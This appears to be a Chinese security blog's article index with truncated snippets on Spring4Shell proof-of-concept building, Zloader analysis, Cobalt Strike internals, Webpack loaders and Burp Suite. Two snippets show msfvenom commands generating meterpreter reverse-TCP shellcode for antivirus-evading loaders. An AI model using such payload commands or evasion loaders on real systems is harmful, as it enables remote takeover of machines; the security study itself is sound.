网安引领时代,弥天点亮未来 0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!0x01漏洞描述2022年3月31日,S...
Spring4Shell 从漏洞情报到POC构造
0x00 前言相信大家对Spring4Shell (CVE-2022-22965)漏洞已经比较熟悉了,网上也有不少师傅的分析文章,这篇就尝试还原一下从漏洞情报到POC构造的过程。0x01 前期情报3月...
Zloader 僵尸网络的技术分析报告
Zloader 最初是一个银行木马,但最近发展成为多个恶意软件系列的分发者,包括各种勒索软件系列。目前,ZLoader僵尸网络攻击已影响到世界各国,其中大多数针...
Oracle out-of-band release for Java SE Vulnerability漏洞分析
今天转载一篇文章,是今天四叶草安全新鲜出的关于CVE...
CobaltStrike逆向学习系列(15)-CS功能分析-BOF
其实在看过 RDI 与 DotNet 功能执行之后,BOF 的执行基本就不用再说了,唯一需要提及的可能就是它所包含的技术,而且相关的文章和代码也都很丰富了 0x01 BOF功能分析 在 CS 中,有相...
CS免杀-Loader 方式
1、Cobalt Strike介绍Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不再使用Metasploit框架而作为一个独立的平台使用,分为客户...
Webpack系列-几个常见的loader
url-loader yarn add url-loader使用url-loader会帮我们把图片变成base64的字符串; 优点: dist---> 少了 .jpg 图片文...
Webpack系列-Loader与插件
Loader Webpack默认情况下只能给js进行打包;后面加入了给其他文件打包的功能,就有了Loader; Loader就是在webpack里面帮助开发者处理不同模块的;比如想要给jpg这种图片打...
Python编写loader加载shellcode免杀学习
(1)msf生成shellcode,使用base64编码。msfvenom -p windows/x64/meterpreter/reverse_tcp --encrypt base64 lhost=...
Go编写loader加载shellcode免杀学习
一 简单实现(1)msf生成shellcode,选择输出hex格式。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168...
看我如何利用 Burp Suite + Fiddler Everywhere 进行PC端和小程序抓包渗透测试
看我如何利用 Burp Suite + Fiddler Everywhere 进行PC端和小程序抓包渗透测试准备工作软件部分Burp Suitehttps://portswigger.net/burp...
Kali安装2021.12版BurpSuite
Burpsuite是一个强大web漏洞挖掘工具,截断代理,解码和编码,Fuzzy进行各种注入,暴力破解和插件扩展等多个模块。但用kali的朋友都知道,kali自带的burpsuite是社区版,因为免费...
41